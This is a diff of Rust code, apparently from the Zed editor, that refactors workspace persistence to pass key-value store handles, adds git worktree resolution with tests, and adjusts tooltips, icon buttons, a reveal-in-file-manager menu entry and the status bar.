@@ -657,15 +665,17 @@ impl RenderOnce for NotificationFrame {
IconButton::new(close_id, close_icon)
.tooltip(move |_window, cx| {
if suppress {
- Tooltip::for_action(
- "Suppress.\nClose with click.",
- &SuppressNotification,
+ Tooltip::with_meta(
+ "Suppress",
+ Some(&SuppressNotification),
+ "Click to Close",
cx,
)
} else if show_suppress_button {
- Tooltip::for_action(
- "Close.\nSuppress with shift-click.",
- &menu::Cancel,
+ Tooltip::with_meta(
+ "Close",
+ Some(&menu::Cancel),
+ "Shift-click to Suppress",
cx,
)
} else {
@@ -915,11 +925,11 @@ pub mod simple_message_notification {
}));
if let Some(icon) = self.primary_icon {
- button = button
- .icon(icon)
- .icon_color(self.primary_icon_color.unwrap_or(Color::Muted))
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small);
+ button = button.start_icon(
+ Icon::new(icon)
+ .size(IconSize::Small)
+ .color(self.primary_icon_color.unwrap_or(Color::Muted)),
+ );
}
button
@@ -935,11 +945,11 @@ pub mod simple_message_notification {
}));
if let Some(icon) = self.secondary_icon {
- button = button
- .icon(icon)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
- .icon_color(self.secondary_icon_color.unwrap_or(Color::Muted));
+ button = button.start_icon(
+ Icon::new(icon)
+ .size(IconSize::Small)
+ .color(self.secondary_icon_color.unwrap_or(Color::Muted)),
+ );
}
button
@@ -953,9 +963,11 @@ pub mod simple_message_notification {
let url = url.clone();
Button::new(message.clone(), message.clone())
.label_size(LabelSize::Small)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Indicator)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Indicator)
+ .color(Color::Muted),
+ )
.on_click(cx.listener(move |_, _, _, cx| {
cx.open_url(&url);
}))
@@ -3192,6 +3192,7 @@ impl Pane {
});
let entry_abs_path = pane.read(cx).entry_abs_path(entry, cx);
+ let reveal_path = entry_abs_path.clone();
let parent_abs_path = entry_abs_path
.as_deref()
.and_then(|abs_path| Some(abs_path.parent()?.to_path_buf()));
@@ -3201,6 +3202,15 @@ impl Pane {
let visible_in_project_panel = relative_path.is_some()
&& worktree.is_some_and(|worktree| worktree.read(cx).is_visible());
+ let is_local = pane.read(cx).project.upgrade().is_some_and(|project| {
+ let project = project.read(cx);
+ project.is_local() || project.is_via_wsl_with_host_interop(cx)
+ });
+ let is_remote = pane
+ .read(cx)
+ .project
+ .upgrade()
+ .is_some_and(|project| project.read(cx).is_remote());
let entry_id = entry.to_proto();
@@ -3233,8 +3243,26 @@ impl Pane {
}),
)
})
+ .when(is_local, |menu| {
+ menu.when_some(reveal_path, |menu, reveal_path| {
+ menu.separator().entry(
+ ui::utils::reveal_in_file_manager_label(is_remote),
+ Some(Box::new(
+ zed_actions::editor::RevealInFileManager,
+ )),
+ window.handler_for(&pane, move |pane, _, cx| {
+ if let Some(project) = pane.project.upgrade() {
+ project.update(cx, |project, cx| {
+ project.reveal_path(&reveal_path, cx);
+ });
+ } else {
+ cx.reveal_path(&reveal_path);
+ }
+ }),
+ )
+ })
+ })
.map(pin_tab_entries)
- .separator()
.when(visible_in_project_panel, |menu| {
menu.entry(
"Reveal In Project Panel",
@@ -14,7 +14,7 @@ use fs::Fs;
use anyhow::{Context as _, Result, bail};
use collections::{HashMap, HashSet, IndexSet};
use db::{
- kvp::KEY_VALUE_STORE,
+ kvp::KeyValueStore,
query,
sqlez::{connection::Connection, domain::Domain},
sqlez_macros::sql,
@@ -174,8 +174,8 @@ impl Column for SerializedWindowBounds {
const DEFAULT_WINDOW_BOUNDS_KEY: &str = "default_window_bounds";
-pub fn read_default_window_bounds() -> Option<(Uuid, WindowBounds)> {
- let json_str = KEY_VALUE_STORE
+pub fn read_default_window_bounds(kvp: &KeyValueStore) -> Option<(Uuid, WindowBounds)> {
+ let json_str = kvp
.read_kvp(DEFAULT_WINDOW_BOUNDS_KEY)
.log_err()
.flatten()?;
@@ -186,13 +186,13 @@ pub fn read_default_window_bounds() -> Option<(Uuid, WindowBounds)> {
}
pub async fn write_default_window_bounds(
+ kvp: &KeyValueStore,
bounds: WindowBounds,
display_uuid: Uuid,
) -> anyhow::Result<()> {
let persisted = WindowBoundsJson::from(bounds);
let json_str = serde_json::to_string(&(display_uuid, persisted))?;
- KEY_VALUE_STORE
- .write_kvp(DEFAULT_WINDOW_BOUNDS_KEY.to_string(), json_str)
+ kvp.write_kvp(DEFAULT_WINDOW_BOUNDS_KEY.to_string(), json_str)
.await?;
Ok(())
}
@@ -290,12 +290,9 @@ impl From<WindowBoundsJson> for WindowBounds {
}
}
-fn multi_workspace_states() -> db::kvp::ScopedKeyValueStore<'static> {
- KEY_VALUE_STORE.scoped("multi_workspace_state")
-}
-
-fn read_multi_workspace_state(window_id: WindowId) -> model::MultiWorkspaceState {
- multi_workspace_states()
+fn read_multi_workspace_state(window_id: WindowId, cx: &App) -> model::MultiWorkspaceState {
+ let kvp = KeyValueStore::global(cx);
+ kvp.scoped("multi_workspace_state")
.read(&window_id.as_u64().to_string())
.log_err()
.flatten()
@@ -303,9 +300,13 @@ fn read_multi_workspace_state(window_id: WindowId) -> model::MultiWorkspaceState
.unwrap_or_default()
}
-pub async fn write_multi_workspace_state(window_id: WindowId, state: model::MultiWorkspaceState) {
+pub async fn write_multi_workspace_state(
+ kvp: &KeyValueStore,
+ window_id: WindowId,
+ state: model::MultiWorkspaceState,
+) {
if let Ok(json_str) = serde_json::to_string(&state) {
- multi_workspace_states()
+ kvp.scoped("multi_workspace_state")
.write(window_id.as_u64().to_string(), json_str)
.await
.log_err();
@@ -314,6 +315,7 @@ pub async fn write_multi_workspace_state(window_id: WindowId, state: model::Mult
pub fn read_serialized_multi_workspaces(
session_workspaces: Vec<model::SessionWorkspace>,
+ cx: &App,
) -> Vec<model::SerializedMultiWorkspace> {
let mut window_groups: Vec<Vec<model::SessionWorkspace>> = Vec::new();
let mut window_id_to_group: HashMap<WindowId, usize> = HashMap::default();
@@ -338,7 +340,7 @@ pub fn read_serialized_multi_workspaces(
.map(|group| {
let window_id = group.first().and_then(|sw| sw.window_id);
let state = window_id
- .map(read_multi_workspace_state)
+ .map(|wid| read_multi_workspace_state(wid, cx))
.unwrap_or_default();
model::SerializedMultiWorkspace {
workspaces: group,
@@ -350,19 +352,18 @@ pub fn read_serialized_multi_workspaces(
const DEFAULT_DOCK_STATE_KEY: &str = "default_dock_state";
-pub fn read_default_dock_state() -> Option<DockStructure> {
- let json_str = KEY_VALUE_STORE
- .read_kvp(DEFAULT_DOCK_STATE_KEY)
- .log_err()
- .flatten()?;
+pub fn read_default_dock_state(kvp: &KeyValueStore) -> Option<DockStructure> {
+ let json_str = kvp.read_kvp(DEFAULT_DOCK_STATE_KEY).log_err().flatten()?;
serde_json::from_str::<DockStructure>(&json_str).ok()
}
-pub async fn write_default_dock_state(docks: DockStructure) -> anyhow::Result<()> {
+pub async fn write_default_dock_state(
+ kvp: &KeyValueStore,
+ docks: DockStructure,
+) -> anyhow::Result<()> {
let json_str = serde_json::to_string(&docks)?;
- KEY_VALUE_STORE
- .write_kvp(DEFAULT_DOCK_STATE_KEY.to_string(), json_str)
+ kvp.write_kvp(DEFAULT_DOCK_STATE_KEY.to_string(), json_str)
.await?;
Ok(())
}
@@ -980,7 +981,7 @@ impl Domain for WorkspaceDb {
}
}
-db::static_connection!(DB, WorkspaceDb, []);
+db::static_connection!(WorkspaceDb, []);
impl WorkspaceDb {
/// Returns a serialized workspace for the given worktree_roots. If the passed array
@@ -1783,11 +1784,17 @@ impl WorkspaceDb {
}
}
- async fn all_paths_exist_with_a_directory(paths: &[PathBuf], fs: &dyn Fs) -> bool {
+ async fn all_paths_exist_with_a_directory(
+ paths: &[PathBuf],
+ fs: &dyn Fs,
+ timestamp: Option<DateTime<Utc>>,
+ ) -> bool {
let mut any_dir = false;
for path in paths {
match fs.metadata(path).await.ok().flatten() {
- None => return false,
+ None => {
+ return timestamp.is_some_and(|t| Utc::now() - t < chrono::Duration::days(7));
+ }
Some(meta) => {
if meta.is_dir {
any_dir = true;
@@ -1843,7 +1850,9 @@ impl WorkspaceDb {
// If a local workspace points to WSL, this check will cause us to wait for the
// WSL VM and file server to boot up. This can block for many seconds.
// Supported scenarios use remote workspaces.
- if !has_wsl_path && Self::all_paths_exist_with_a_directory(paths.paths(), fs).await {
+ if !has_wsl_path
+ && Self::all_paths_exist_with_a_directory(paths.paths(), fs, Some(timestamp)).await
+ {
result.push((id, SerializedWorkspaceLocation::Local, paths, timestamp));
} else {
delete_tasks.push(self.delete_workspace_by_id(id));
@@ -1903,7 +1912,7 @@ impl WorkspaceDb {
window_id,
});
} else {
- if Self::all_paths_exist_with_a_directory(paths.paths(), fs).await {
+ if Self::all_paths_exist_with_a_directory(paths.paths(), fs, None).await {
workspaces.push(SessionWorkspace {
workspace_id,
location: SerializedWorkspaceLocation::Local,
@@ -2244,7 +2253,7 @@ impl WorkspaceDb {
use db::sqlez::statement::Statement;
use itertools::Itertools as _;
- DB.clear_trusted_worktrees()
+ self.clear_trusted_worktrees()
.await
.context("clearing previous trust state")?;
@@ -2311,7 +2320,7 @@ VALUES {placeholders};"#
}
pub fn fetch_trusted_worktrees(&self) -> Result<DbTrustedPaths> {
- let trusted_worktrees = DB.trusted_worktrees()?;
+ let trusted_worktrees = self.trusted_worktrees()?;
Ok(trusted_worktrees
.into_iter()
.filter_map(|(abs_path, user_name, host_name)| {
@@ -2350,6 +2359,86 @@ VALUES {placeholders};"#
}
}
+type WorkspaceEntry = (
+ WorkspaceId,
+ SerializedWorkspaceLocation,
+ PathList,
+ DateTime<Utc>,
+);
+
+/// Resolves workspace entries whose paths are git linked worktree checkouts
+/// to their main repository paths.
+///
+/// For each workspace entry:
+/// - If any path is a linked worktree checkout, all worktree paths in that
+/// entry are resolved to their main repository paths, producing a new
+/// `PathList`.
+/// - The resolved entry is then deduplicated against existing entries: if a
+/// workspace with the same paths already exists, the entry with the most
+/// recent timestamp is kept.
+pub async fn resolve_worktree_workspaces(
+ workspaces: impl IntoIterator<Item = WorkspaceEntry>,
+ fs: &dyn Fs,
+) -> Vec<WorkspaceEntry> {
+ // First pass: resolve worktree paths to main repo paths concurrently.
+ let resolved = futures::future::join_all(workspaces.into_iter().map(|entry| async move {
+ let paths = entry.2.paths();
+ if paths.is_empty() {
+ return entry;
+ }
+
+ // Resolve each path concurrently
+ let resolved_paths = futures::future::join_all(
+ paths
+ .iter()
+ .map(|path| project::git_store::resolve_git_worktree_to_main_repo(fs, path)),
+ )
+ .await;
+
+ // If no paths were resolved, this entry is not a worktree — keep as-is
+ if resolved_paths.iter().all(|r| r.is_none()) {
+ return entry;
+ }
+
+ // Build new path list, substituting resolved paths
+ let new_paths: Vec<PathBuf> = paths
+ .iter()
+ .zip(resolved_paths.iter())
+ .map(|(original, resolved)| {
+ resolved
+ .as_ref()
+ .cloned()
+ .unwrap_or_else(|| original.clone())
+ })
+ .collect();
+
+ let new_path_refs: Vec<&Path> = new_paths.iter().map(|p| p.as_path()).collect();
+ (entry.0, entry.1, PathList::new(&new_path_refs), entry.3)
+ }))
+ .await;
+
+ // Second pass: deduplicate by PathList.
+ // When two entries resolve to the same paths, keep the one with the
+ // more recent timestamp.
+ let mut seen: collections::HashMap<Vec<PathBuf>, usize> = collections::HashMap::default();
+ let mut result: Vec<WorkspaceEntry> = Vec::new();
+
+ for entry in resolved {
+ let key: Vec<PathBuf> = entry.2.paths().to_vec();
+ if let Some(&existing_idx) = seen.get(&key) {
+ // Keep the entry with the more recent timestamp
+ if entry.3 > result[existing_idx].3 {
+ result[existing_idx] = entry;
+ }
+ } else {
+ seen.insert(key, result.len());
+ result.push(entry);
+ }
+ }
+
+ result
+}
+
pub fn delete_unloaded_items(
alive_items: Vec<ItemId>,
workspace_id: WorkspaceId,
@@ -2393,6 +2482,14 @@ mod tests {
use serde_json::json;
use std::{thread, time::Duration};
+ /// Creates a unique directory in a FakeFs, returning the path.
+ /// Uses a UUID suffix to avoid collisions with other tests sharing the global DB.
+ async fn unique_test_dir(fs: &fs::FakeFs, prefix: &str) -> PathBuf {
+ let dir = PathBuf::from(format!("/test-dirs/{}-{}", prefix, uuid::Uuid::new_v4()));
+ fs.insert_tree(&dir, json!({})).await;
+ dir
+ }
+
#[gpui::test]
async fn test_multi_workspace_serializes_on_add_and_remove(cx: &mut gpui::TestAppContext) {
use crate::multi_workspace::MultiWorkspace;
@@ -2434,7 +2531,7 @@ mod tests {
cx.run_until_parked();
// Read back the persisted state and check that the active workspace ID was written.
- let state_after_add = read_multi_workspace_state(window_id);
+ let state_after_add = cx.update(|_, cx| read_multi_workspace_state(window_id, cx));
let active_workspace2_db_id = workspace2.read_with(cx, |ws, _| ws.database_id());
assert_eq!(
state_after_add.active_workspace_id, active_workspace2_db_id,
@@ -2449,7 +2546,7 @@ mod tests {
cx.run_until_parked();
- let state_after_remove = read_multi_workspace_state(window_id);
+ let state_after_remove = cx.update(|_, cx| read_multi_workspace_state(window_id, cx));
let remaining_db_id =
multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id());
assert_eq!(
@@ -3866,14 +3963,17 @@ mod tests {
}
#[gpui::test]
- async fn test_read_serialized_multi_workspaces_with_state() {
+ async fn test_read_serialized_multi_workspaces_with_state(cx: &mut gpui::TestAppContext) {
use crate::persistence::model::MultiWorkspaceState;
// Write multi-workspace state for two windows via the scoped KVP.
let window_10 = WindowId::from(10u64);
let window_20 = WindowId::from(20u64);
+ let kvp = cx.update(|cx| KeyValueStore::global(cx));
+
write_multi_workspace_state(
+ &kvp,
window_10,
MultiWorkspaceState {
active_workspace_id: Some(WorkspaceId(2)),
@@ -3883,6 +3983,7 @@ mod tests {
.await;
write_multi_workspace_state(
+ &kvp,
window_20,
MultiWorkspaceState {
active_workspace_id: Some(WorkspaceId(3)),
@@ -3919,7 +4020,7 @@ mod tests {
},
];
- let results = read_serialized_multi_workspaces(session_workspaces);
+ let results = cx.update(|cx| read_serialized_multi_workspaces(session_workspaces, cx));
// Should produce 3 groups: window 10, window 20, and the orphan.
assert_eq!(results.len(), 3);
@@ -3965,14 +4066,16 @@ mod tests {
let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+ let db = cx.update(|_, cx| WorkspaceDb::global(cx));
+
// Assign a database_id so serialization will actually persist.
- let workspace_id = DB.next_id().await.unwrap();
+ let workspace_id = db.next_id().await.unwrap();
workspace.update(cx, |ws, _cx| {
ws.set_database_id(workspace_id);
});
// Mutate some workspace state.
- DB.set_centered_layout(workspace_id, true).await.unwrap();
+ db.set_centered_layout(workspace_id, true).await.unwrap();
// Call flush_serialization and await the returned task directly
// (without run_until_parked — the point is that awaiting the task
@@ -3984,7 +4087,7 @@ mod tests {
task.await;
// Read the workspace back from the DB and verify serialization happened.
- let serialized = DB.workspace_for_id(workspace_id);
+ let serialized = db.workspace_for_id(workspace_id);
assert!(
serialized.is_some(),
"flush_serialization should have persisted the workspace to DB"
@@ -3992,9 +4095,7 @@ mod tests {
}
#[gpui::test]
- async fn test_create_workspace_serializes_active_workspace_id_after_db_id_assigned(
- cx: &mut gpui::TestAppContext,
- ) {
+ async fn test_create_workspace_serialization(cx: &mut gpui::TestAppContext) {
use crate::multi_workspace::MultiWorkspace;
use crate::persistence::read_multi_workspace_state;
use feature_flags::FeatureFlagAppExt;
@@ -4024,73 +4125,32 @@ mod tests {
// Create a new workspace via the MultiWorkspace API (triggers next_id()).
multi_workspace.update_in(cx, |mw, window, cx| {
- mw.create_workspace(window, cx);
+ mw.create_test_workspace(window, cx).detach();
});
// Let the async next_id() and re-serialization tasks complete.
cx.run_until_parked();
- // Read back the multi-workspace state.
- let state = read_multi_workspace_state(window_id);
-
- // The new workspace should now have a database_id, and the multi-workspace
- // state should record it as the active workspace.
+ // The new workspace should now have a database_id.
let new_workspace_db_id =
multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id());
assert!(
new_workspace_db_id.is_some(),
"New workspace should have a database_id after run_until_parked"
);
+
+ // The multi-workspace state should record it as the active workspace.
+ let state = cx.update(|_, cx| read_multi_workspace_state(window_id, cx));
assert_eq!(
state.active_workspace_id, new_workspace_db_id,
"Serialized active_workspace_id should match the new workspace's database_id"
);
- }
-
- #[gpui::test]
- async fn test_create_workspace_individual_serialization(cx: &mut gpui::TestAppContext) {
- use crate::multi_workspace::MultiWorkspace;
- use feature_flags::FeatureFlagAppExt;
-
- use project::Project;
-
- crate::tests::init_test(cx);
-
- cx.update(|cx| {
- cx.set_staff(true);
- cx.update_flags(true, vec!["agent-v2".to_string()]);
- });
-
- let fs = fs::FakeFs::new(cx.executor());
- let project = Project::test(fs.clone(), [], cx).await;
-
- let (multi_workspace, cx) =
- cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
-
- multi_workspace.update_in(cx, |mw, _, cx| {
- mw.set_random_database_id(cx);
- });
-
- // Create a new workspace.
- multi_workspace.update_in(cx, |mw, window, cx| {
- mw.create_workspace(window, cx);
- });
-
- cx.run_until_parked();
-
- // Get the new workspace's database_id.
- let new_db_id =
- multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id());
- assert!(
- new_db_id.is_some(),
- "New workspace should have a database_id"
- );
-
- let workspace_id = new_db_id.unwrap();
- // The workspace should have been serialized to the DB with real data
+ // The individual workspace row should exist with real data
// (not just the bare DEFAULT VALUES row from next_id).
- let serialized = DB.workspace_for_id(workspace_id);
+ let workspace_id = new_workspace_db_id.unwrap();
+ let db = cx.update(|_, cx| WorkspaceDb::global(cx));
+ let serialized = db.workspace_for_id(workspace_id);
assert!(
serialized.is_some(),
"Newly created workspace should be fully serialized in the DB after database_id assignment"
@@ -4098,7 +4158,7 @@ mod tests {
}
#[gpui::test]
- async fn test_remove_workspace_deletes_db_row(cx: &mut gpui::TestAppContext) {
+ async fn test_remove_workspace_clears_session_binding(cx: &mut gpui::TestAppContext) {
use crate::multi_workspace::MultiWorkspace;
use feature_flags::FeatureFlagAppExt;
use gpui::AppContext as _;
@@ -4112,6 +4172,7 @@ mod tests {
});
let fs = fs::FakeFs::new(cx.executor());
+ let dir = unique_test_dir(&fs, "remove").await;
let project1 = Project::test(fs.clone(), [], cx).await;
let project2 = Project::test(fs.clone(), [], cx).await;
@@ -4122,8 +4183,10 @@ mod tests {
mw.set_random_database_id(cx);
});
+ let db = cx.update(|_, cx| WorkspaceDb::global(cx));
+
// Get a real DB id for workspace2 so the row actually exists.
- let workspace2_db_id = DB.next_id().await.unwrap();
+ let workspace2_db_id = db.next_id().await.unwrap();
multi_workspace.update_in(cx, |mw, window, cx| {
let workspace = cx.new(|cx| crate::Workspace::test_new(project2.clone(), window, cx));
@@ -4134,16 +4197,17 @@ mod tests {
});
// Save a full workspace row to the DB directly.
- DB.save_workspace(SerializedWorkspace {
+ let session_id = format!("remove-test-session-{}", Uuid::new_v4());
+ db.save_workspace(SerializedWorkspace {
id: workspace2_db_id,
- paths: PathList::new(&["/tmp/remove_test"]),
+ paths: PathList::new(&[&dir]),
location: SerializedWorkspaceLocation::Local,
center_group: Default::default(),
window_bounds: Default::default(),
display: Default::default(),
docks: Default::default(),
centered_layout: false,
- session_id: Some("remove-test-session".to_owned()),
+ session_id: Some(session_id.clone()),
breakpoints: Default::default(),
window_id: Some(99),
user_toolchains: Default::default(),
@@ -4151,7 +4215,7 @@ mod tests {
.await;
assert!(
- DB.workspace_for_id(workspace2_db_id).is_some(),
+ db.workspace_for_id(workspace2_db_id).is_some(),
"Workspace2 should exist in DB before removal"
);
@@ -4162,10 +4226,25 @@ mod tests {
cx.run_until_parked();
- // The row should be deleted, not just have session_id cleared.
+ // The row should still exist so it continues to appear in recent
+ // projects, but the session binding should be cleared so it is not
+ // restored as part of any future session.
assert!(
- DB.workspace_for_id(workspace2_db_id).is_none(),
- "Removed workspace's DB row should be deleted entirely"
+ db.workspace_for_id(workspace2_db_id).is_some(),
+ "Removed workspace's DB row should be preserved for recent projects"
+ );
+
+ let session_workspaces = db
+ .last_session_workspace_locations(&session_id, None, fs.as_ref())
+ .await
+ .unwrap();
+ let restored_ids: Vec<WorkspaceId> = session_workspaces
+ .iter()
+ .map(|sw| sw.workspace_id)
+ .collect();
+ assert!(
+ !restored_ids.contains(&workspace2_db_id),
+ "Removed workspace should not appear in session restoration"
);
}
@@ -4192,9 +4271,11 @@ mod tests {
let project1 = Project::test(fs.clone(), [], cx).await;
let project2 = Project::test(fs.clone(), [], cx).await;
+ let db = cx.update(|cx| WorkspaceDb::global(cx));
+
// Get real DB ids so the rows actually exist.
- let ws1_id = DB.next_id().await.unwrap();
- let ws2_id = DB.next_id().await.unwrap();
+ let ws1_id = db.next_id().await.unwrap();
+ let ws2_id = db.next_id().await.unwrap();
let (multi_workspace, cx) =
cx.add_window_view(|window, cx| MultiWorkspace::test_new(project1.clone(), window, cx));
@@ -4216,7 +4297,7 @@ mod tests {
let session_id = "test-zombie-session";
let window_id_val: u64 = 42;
- DB.save_workspace(SerializedWorkspace {
+ db.save_workspace(SerializedWorkspace {
id: ws1_id,
paths: PathList::new(&[dir1.path()]),
location: SerializedWorkspaceLocation::Local,
@@ -4232,7 +4313,7 @@ mod tests {
})
.await;
- DB.save_workspace(SerializedWorkspace {
+ db.save_workspace(SerializedWorkspace {
id: ws2_id,
paths: PathList::new(&[dir2.path()]),
location: SerializedWorkspaceLocation::Local,
@@ -4256,7 +4337,7 @@ mod tests {
cx.run_until_parked();
// The removed workspace should NOT appear in session restoration.
- let locations = DB
+ let locations = db
.last_session_workspace_locations(session_id, None, fs.as_ref())
.await
.unwrap();
@@ -4288,11 +4369,14 @@ mod tests {
});
let fs = fs::FakeFs::new(cx.executor());
+ let dir = unique_test_dir(&fs, "pending-removal").await;
let project1 = Project::test(fs.clone(), [], cx).await;
let project2 = Project::test(fs.clone(), [], cx).await;
+ let db = cx.update(|cx| WorkspaceDb::global(cx));
+
// Get a real DB id for workspace2 so the row actually exists.
- let workspace2_db_id = DB.next_id().await.unwrap();
+ let workspace2_db_id = db.next_id().await.unwrap();
let (multi_workspace, cx) =
cx.add_window_view(|window, cx| MultiWorkspace::test_new(project1.clone(), window, cx));
@@ -4310,16 +4394,17 @@ mod tests {
});
// Save a full workspace row to the DB directly and let it settle.
- DB.save_workspace(SerializedWorkspace {
+ let session_id = format!("pending-removal-session-{}", Uuid::new_v4());
+ db.save_workspace(SerializedWorkspace {
id: workspace2_db_id,
- paths: PathList::new(&["/tmp/pending_removal_test"]),
+ paths: PathList::new(&[&dir]),
location: SerializedWorkspaceLocation::Local,
center_group: Default::default(),
window_bounds: Default::default(),
display: Default::default(),
docks: Default::default(),
centered_layout: false,
- session_id: Some("pending-removal-session".to_owned()),
+ session_id: Some(session_id.clone()),
breakpoints: Default::default(),
window_id: Some(88),
user_toolchains: Default::default(),
@@ -4353,10 +4438,24 @@ mod tests {
});
futures::future::join_all(all_tasks).await;
- // After awaiting, the DB row should be deleted.
+ // The row should still exist (for recent projects), but the session
+ // binding should have been cleared by the pending removal task.
assert!(
- DB.workspace_for_id(workspace2_db_id).is_none(),
- "Pending removal task should have deleted the workspace row when awaited"
+ db.workspace_for_id(workspace2_db_id).is_some(),
+ "Workspace row should be preserved for recent projects"
+ );
+
+ let session_workspaces = db
+ .last_session_workspace_locations(&session_id, None, fs.as_ref())
+ .await
+ .unwrap();
+ let restored_ids: Vec<WorkspaceId> = session_workspaces
+ .iter()
+ .map(|sw| sw.workspace_id)
+ .collect();
+ assert!(
+ !restored_ids.contains(&workspace2_db_id),
+ "Pending removal task should have cleared the session binding"
);
}
@@ -4383,11 +4482,9 @@ mod tests {
mw.set_random_database_id(cx);
});
- multi_workspace.update_in(cx, |mw, window, cx| {
- mw.create_workspace(window, cx);
- });
-
- cx.run_until_parked();
+ let task =
+ multi_workspace.update_in(cx, |mw, window, cx| mw.create_test_workspace(window, cx));
+ task.await;
let new_workspace_db_id =
multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id());
@@ -4398,8 +4495,10 @@ mod tests {
let workspace_id = new_workspace_db_id.unwrap();
+ let db = cx.update(|_, cx| WorkspaceDb::global(cx));
+
assert!(
- DB.workspace_for_id(workspace_id).is_some(),
+ db.workspace_for_id(workspace_id).is_some(),
"The workspace row should exist in the DB"
);
@@ -4410,7 +4509,7 @@ mod tests {
cx.executor().advance_clock(Duration::from_millis(200));
cx.run_until_parked();
- let serialized = DB
+ let serialized = db
.workspace_for_id(workspace_id)
.expect("workspace row should still exist");
assert!(
@@ -4443,7 +4542,8 @@ mod tests {
let (multi_workspace, cx) =
cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
- let workspace_id = DB.next_id().await.unwrap();
+ let db = cx.update(|_, cx| WorkspaceDb::global(cx));
+ let workspace_id = db.next_id().await.unwrap();
multi_workspace.update_in(cx, |mw, _, cx| {
mw.workspace().update(cx, |ws, _cx| {
ws.set_database_id(workspace_id);
@@ -4456,7 +4556,7 @@ mod tests {
});
task.await;
- let after = DB
+ let after = db
.workspace_for_id(workspace_id)
.expect("workspace row should exist after flush_serialization");
assert!(
@@ -4469,4 +4569,116 @@ mod tests {
before the process exits."
);
}
+
+ #[gpui::test]
+ async fn test_resolve_worktree_workspaces(cx: &mut gpui::TestAppContext) {
+ let fs = fs::FakeFs::new(cx.executor());
+
+ // Main repo with a linked worktree entry
+ fs.insert_tree(
+ "/repo",
+ json!({
+ ".git": {
+ "worktrees": {
+ "feature": {
+ "commondir": "../../",
+ "HEAD": "ref: refs/heads/feature"
+ }
+ }
+ },
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+
+ // Linked worktree checkout pointing back to /repo
+ fs.insert_tree(
+ "/worktree",
+ json!({
+ ".git": "gitdir: /repo/.git/worktrees/feature",
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+
+ // A plain non-git project
+ fs.insert_tree(
+ "/plain-project",
+ json!({
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+
+ // Another normal git repo (used in mixed-path entry)
+ fs.insert_tree(
+ "/other-repo",
+ json!({
+ ".git": {},
+ "src": { "lib.rs": "" }
+ }),
+ )
+ .await;
+
+ let t0 = Utc::now() - chrono::Duration::hours(4);
+ let t1 = Utc::now() - chrono::Duration::hours(3);
+ let t2 = Utc::now() - chrono::Duration::hours(2);
+ let t3 = Utc::now() - chrono::Duration::hours(1);
+
+ let workspaces = vec![
+ // 1: Main checkout of /repo (opened earlier)
+ (
+ WorkspaceId(1),
+ SerializedWorkspaceLocation::Local,
+ PathList::new(&["/repo"]),
+ t0,
+ ),
+ // 2: Linked worktree of /repo (opened more recently)
+ // Should dedup with #1; more recent timestamp wins.
+ (
+ WorkspaceId(2),
+ SerializedWorkspaceLocation::Local,
+ PathList::new(&["/worktree"]),
+ t1,
+ ),
+ // 3: Mixed-path workspace: one root is a linked worktree,
+ // the other is a normal repo. The worktree path should be
+ // resolved; the normal path kept as-is.
+ (
+ WorkspaceId(3),
+ SerializedWorkspaceLocation::Local,
+ PathList::new(&["/other-repo", "/worktree"]),
+ t2,
+ ),
+ // 4: Non-git project — passed through unchanged.
+ (
+ WorkspaceId(4),
+ SerializedWorkspaceLocation::Local,
+ PathList::new(&["/plain-project"]),
+ t3,
+ ),
+ ];
+
+ let result = resolve_worktree_workspaces(workspaces, fs.as_ref()).await;
+
+ // Should have 3 entries: #1 and #2 deduped into one, plus #3 and #4.
+ assert_eq!(result.len(), 3);
+
+ // First entry: /repo — deduplicated from #1 and #2.
+ // Keeps the position of #1 (first seen), but with #2's later timestamp.
+ assert_eq!(result[0].2.paths(), &[PathBuf::from("/repo")]);
+ assert_eq!(result[0].3, t1);
+
+ // Second entry: mixed-path workspace with worktree resolved.
+ // /worktree → /repo, so paths become [/other-repo, /repo] (sorted).
+ assert_eq!(
+ result[1].2.paths(),
+ &[PathBuf::from("/other-repo"), PathBuf::from("/repo")]
+ );
+ assert_eq!(result[1].0, WorkspaceId(3));
+
+ // Third entry: non-git project, unchanged.
+ assert_eq!(result[2].2.paths(), &[PathBuf::from("/plain-project")]);
+ assert_eq!(result[2].0, WorkspaceId(4));
+ }
}
@@ -1,11 +1,11 @@
-use crate::{ItemHandle, Pane};
+use crate::{ItemHandle, MultiWorkspace, Pane, ToggleWorkspaceSidebar};
use gpui::{
AnyView, App, Context, Decorations, Entity, IntoElement, ParentElement, Render, Styled,
Subscription, Window,
};
use std::any::TypeId;
use theme::CLIENT_SIDE_DECORATION_ROUNDING;
-use ui::{h_flex, prelude::*};
+use ui::{Divider, Indicator, Tooltip, prelude::*};
use util::ResultExt;
pub trait StatusItemView: Render {
@@ -35,6 +35,8 @@ pub struct StatusBar {
active_pane: Entity<Pane>,
_observe_active_pane: Subscription,
workspace_sidebar_open: bool,
+ sidebar_has_notifications: bool,
+ show_sidebar_toggle: bool,
}
impl Render for StatusBar {
@@ -43,8 +45,7 @@ impl Render for StatusBar {
.w_full()
.justify_between()
.gap(DynamicSpacing::Base08.rems(cx))
- .py(DynamicSpacing::Base04.rems(cx))
- .px(DynamicSpacing::Base06.rems(cx))
+ .p(DynamicSpacing::Base04.rems(cx))
.bg(cx.theme().colors().status_bar_background)
.map(|el| match window.window_decorations() {
Decorations::Server => el,
@@ -61,25 +62,58 @@ impl Render for StatusBar {
.border_b(px(1.0))
.border_color(cx.theme().colors().status_bar_background),
})
- .child(self.render_left_tools())
+ .child(self.render_left_tools(cx))
.child(self.render_right_tools())
}
}
impl StatusBar {
- fn render_left_tools(&self) -> impl IntoElement {
+ fn render_left_tools(&self, cx: &mut Context<Self>) -> impl IntoElement {
h_flex()
.gap_1()
+ .min_w_0()
